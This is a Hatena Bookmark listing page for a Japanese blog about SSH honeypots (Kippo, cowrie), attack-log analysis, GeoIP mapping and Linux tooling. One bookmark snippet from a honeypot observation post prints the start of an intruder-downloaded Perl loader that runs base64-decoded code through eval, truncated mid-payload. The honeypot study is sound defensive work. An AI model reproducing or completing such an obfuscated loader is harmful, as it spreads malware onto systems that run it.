はてなブックマークアプリ

サクサク読めて、
アプリ限定の機能も多数!

アプリで開く

はてなブックマーク

  • はてなブックマークって?
  • アプリ・拡張の紹介
  • ユーザー登録
  • ログイン
  • Hatena

はてなブックマーク

トップへ戻る

  • 総合
    • 人気
    • 新着
    • IT
    • 最新ガジェット
    • 自然科学
    • 経済・金融
    • おもしろ
    • マンガ
    • ゲーム
    • はてなブログ(総合)
  • 一般
    • 人気
    • 新着
    • 社会ニュース
    • 地域
    • 国際
    • 天気
    • グルメ
    • 映画・音楽
    • スポーツ
    • はてな匿名ダイアリー
    • はてなブログ(一般)
  • 世の中
    • 人気
    • 新着
    • 新型コロナウイルス
    • 働き方
    • 生き方
    • 地域
    • 医療・ヘルス
    • 教育
    • はてな匿名ダイアリー
    • はてなブログ(世の中)
  • 政治と経済
    • 人気
    • 新着
    • 政治
    • 経済・金融
    • 企業
    • 仕事・就職
    • マーケット
    • 国際
    • はてなブログ(政治と経済)
  • 暮らし
    • 人気
    • 新着
    • カルチャー・ライフスタイル
    • ファッション
    • 運動・エクササイズ
    • 結婚・子育て
    • 住まい
    • グルメ
    • 相続
    • はてなブログ(暮らし)
    • 掃除・整理整頓
    • 雑貨
    • 買ってよかったもの
    • 旅行
    • アウトドア
    • 趣味
  • 学び
    • 人気
    • 新着
    • 人文科学
    • 社会科学
    • 自然科学
    • 語学
    • ビジネス・経営学
    • デザイン
    • 法律
    • 本・書評
    • 将棋・囲碁
    • はてなブログ(学び)
  • テクノロジー
    • 人気
    • 新着
    • IT
    • セキュリティ技術
    • はてなブログ(テクノロジー)
    • AI・機械学習
    • プログラミング
    • エンジニア
  • おもしろ
    • 人気
    • 新着
    • まとめ
    • ネタ
    • おもしろ
    • これはすごい
    • かわいい
    • 雑学
    • 癒やし
    • はてなブログ(おもしろ)
  • エンタメ
    • 人気
    • 新着
    • スポーツ
    • 映画
    • 音楽
    • アイドル
    • 芸能
    • お笑い
    • サッカー
    • 話題の動画
    • はてなブログ(エンタメ)
  • アニメとゲーム
    • 人気
    • 新着
    • マンガ
    • Webマンガ
    • ゲーム
    • 任天堂
    • PlayStation
    • アニメ
    • バーチャルYouTuber
    • オタクカルチャー
    • はてなブログ(アニメとゲーム)
    • はてなブログ(ゲーム)
  • おすすめ

    大阪万博

『Simple blog @atani』

  • 人気
  • 新着
  • すべて
  • 地理情報を取得して、どこから不正アクセスがあったのか分布図を出す。

    3 users

    atani.github.io

    数回に分けて、cowrieでsshの不正アクセスの実態を取得するようにしてきた。 ハニーポットcowrieのログを、mariaDBで管理しよう cowrieの不正侵入ログをelasticsearchにデータを入れる td-agent2-2-1ではfilterが使えるように 構成としてはこのような感じ。 今回は不正アクセスIPを利用し、地理情報を得て、どの国からのアクセスが多いのかをkibana4を使って出してみた。 GeoIPを設定する。geoipをインストールする。

    • テクノロジー
    • 2015/11/02 19:39
    • ハニーポットcowrieのログを、mariaDBで管理しよう。

      5 users

      atani.github.io

      前回、構築手順を書いたkippo。 ログをMySQL(mariaDB)で管理したいと思い、kippoで設定を試みるも、以下エラーが出て、途方にくれていた。 2015-07-21 00:41:42+0900 [-] Unable to format event {'log_namespace': 'twisted.logger._global', 'log_level': <LogLevel=warn>, 'fileNow': '/usr/lib64/python2.7/site-packages/twisted/python/log.py', 'format': '%(log_legacy)s', 'lineNow': 210, 'fileThen': '/usr/lib64/python2.7/site-packages/twisted/python/log.py', 'log_sour

      • テクノロジー
      • 2015/07/22 23:15
      • SSH不正侵入、観察日記

        233 users

        atani.github.io

        不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy

        • 学び
        • 2015/07/14 00:08
        • セキュリティ
        • ssh
        • ハニーポット
        • security
        • Linux
        • kippo
        • perl
        • アクセス
        • あとで読む
        • HTTP
        • SSHの不正侵入で多いパスワードランキング

          4 users

          atani.github.io

          サーバーにKippoを導入して以来、クラッカーから大量にSSHのログイン試行されているので、ログインに失敗したログからアカウントとパスワードを抜き出して、ランキングを作ってみた。 本ランキングを作るにあたり、 elasticsearch1.6 + kibana4 を利用した(こちらの導入方法は後日)。 また、kippoの導入方法は既に以下に記載済みなので参考にされたし。 CentOS7にKippoをインストールする 抽出条件kippo の以下のログインを試みたが失敗しているログから、アカウントとパスワードを取得。 ランキング化をしたものは大きく以下の2パターン。 最も試行の多いパスワードの文字数 6列目までのそれぞれ使用される頻度が多い文字数 取得期間: 2015/06/28 - 2015/07/04 では、ランキングスタート!! ランキングパスワードを使った文字数ランキングを出してみた。

          • 世の中
          • 2015/07/13 08:44
          • mod_mrubyとmruby-geoipを使って地理情報でアクセス制御

            7 users

            atani.github.io

            # diff -ur build_config.rb_backup build_config.rb --- build_config.rb_backup 2015-07-03 13:32:27.017667686 +0900 +++ build_config.rb 2015-07-03 13:37:33.756710824 +0900 @@ -15,13 +15,14 @@ conf.gem :github => 'iij/mruby-pack' conf.gem :github => 'mattn/mruby-json' conf.gem :github => 'mattn/mruby-onig-regexp' - conf.gem :github => 'matsumoto-r/mruby-redis' - conf.gem :github => 'matsumoto-r/mruby-

            • テクノロジー
            • 2015/07/03 20:01
            • インフラ
            • あとで読む
            • ssh専用ハニーポットKippo

              64 users

              atani.github.io

              SSHに辞書攻撃して、サーバに侵入しようと試みるクラッカーの動向を追うために、ssh用のハニーポットを導入してみた。 名前は「Kippo」。 インストール手順はsshハニーポットをkippoで作ってみる を参考にさせていただいた。 構成としては以下のとおり。 ┌──────────────┐ │ Cracker │ └──────┬───────┘ │ │ port:22 │ │ ▼ ┌───────────────────┐ │ firewalld │ │ ↓ │ │ portfoward-to: │ │ 22222 │ │ ↓ │ │ Kippo │ └───────────────────┘ 2015-06-29 20:25:36+0900 [SSHService ssh-userauth on HoneyPotTransport,442,43.255.189.44] login a

              • テクノロジー
              • 2015/07/03 16:15
              • ssh
              • security
              • server
              • あとで読む
              • Article
              • 起動が遅い原因は?そんな時はsystemd-analyzeでチェック

                13 users

                atani.github.io

                # systemd-analyze Startup finished in 666ms (kernel) + 2.171s (initrd) + 4.705s (userspace) = 7.542s kernel, initrd, userspace それぞれの合計時間をだしてくれる。 より詳細を知りたい場合は、blame オプションを使う。systemd-analyze blame の実行結果 # systemd-analyze blame 1.120s firewalld.service 1.032s network.service 987ms boot.mount 712ms tuned.service 574ms vboxadd.service 458ms vboxadd-x11.service 320ms systemd-vconsole-setup.service 293ms

                • テクノロジー
                • 2015/06/05 16:29
                • systemd
                • Linux
                • tuning
                • ubuntu
                • 起動が遅い原因は?そんな時はsystemd-analyzeでチェック

                  19 users

                  atani.github.io

                  # systemd-analyze Startup finished in 666ms (kernel) + 2.171s (initrd) + 4.705s (userspace) = 7.542s kernel, initrd, userspace それぞれの合計時間をだしてくれる。 より詳細を知りたい場合は、blame オプションを使う。systemd-analyze blame の実行結果 # systemd-analyze blame 1.120s firewalld.service 1.032s network.service 987ms boot.mount 712ms tuned.service 574ms vboxadd.service 458ms vboxadd-x11.service 320ms systemd-vconsole-setup.service 293ms

                  • テクノロジー
                  • 2015/06/03 00:53
                  • systemd
                  • linux
                  • debug
                  • performance
                  • service
                  • Saved For Later
                  • あとで読む
                  • Alfred2で快適生活はじめましょう

                    31 users

                    atani.github.io

                    Alfred2ってなに?macユーザーのための便利なランチャーです。 ランチャーってなに?マウスやトラックパッドで何度もぽちぽちクリックしてアプリを開いたりする面倒を省いてくれます。 インストールAlfred2 の無料版をダウンロードして、インストールしましょう。 インストール後の使い方。あなたがすべきことはたったの2ステップです。 option + space を叩いて、ランチャーを開く。 起動したいアプリ名を入れて(途中まででもOK) Enter すると即座にアプリが起動します! 他にもたくさん機能があります。 計算したり、 検索したり… シャットダウンや、スニペットも使えます。快適になること間違いなし。 参照: Macユーザー必須の神アプリ Alfred の基本的な使い方とか設定方法とか その1(検索&アクション)

                    • テクノロジー
                    • 2015/04/18 01:07
                    • alfred
                    • Mac
                    • Saved For Later
                    • アプリ
                    • 生活
                    • あとで読む
                    • Simple blog @atani

                      4 users

                      atani.github.io

                      cowrieを 7か月 運用して、大量に来た不正アクセス全20154件から色んなランキングを出してみた。 今後の運用の参考にして欲しい。 Read More 処理に時間がかかることがあり、どこが原因で遅くなっているのかを調べるときにstraceを利用して原因調査をしたことがあったので、使い方をまとめる。 基本的な使い方 これから処理を実行するとき usage: strace 実行処理 ex: strace perl hoge.pl 既に起動しているプロセスに対して実行するとき usage: strace -p [pid] ex: strace -p 111 Read More

                      • テクノロジー
                      • 2015/04/17 09:58

                      このページはまだ
                      ブックマークされていません

                      このページを最初にブックマークしてみませんか?

                      『Simple blog @atani』の新着エントリーを見る

                      キーボードショートカット一覧

                      j次のブックマーク

                      k前のブックマーク

                      lあとで読む

                      eコメント一覧を開く

                      oページを開く

                      はてなブックマーク

                      • 総合
                      • 一般
                      • 世の中
                      • 政治と経済
                      • 暮らし
                      • 学び
                      • テクノロジー
                      • エンタメ
                      • アニメとゲーム
                      • おもしろ
                      • アプリ・拡張機能
                      • 開発ブログ
                      • ヘルプ
                      • お問い合わせ
                      • ガイドライン
                      • 利用規約
                      • プライバシーポリシー
                      • 利用者情報の外部送信について
                      • ガイドライン
                      • 利用規約
                      • プライバシーポリシー
                      • 利用者情報の外部送信について

                      公式Twitter

                      • 公式アカウント
                      • ホットエントリー

                      はてなのサービス

                      • はてなブログ
                      • はてなブログPro
                      • 人力検索はてな
                      • はてなブログ タグ
                      • はてなニュース
                      • ソレドコ
                      • App Storeからダウンロード
                      • Google Playで手に入れよう
                      Copyright © 2005-2025 Hatena. All Rights Reserved.
                      設定を変更しましたx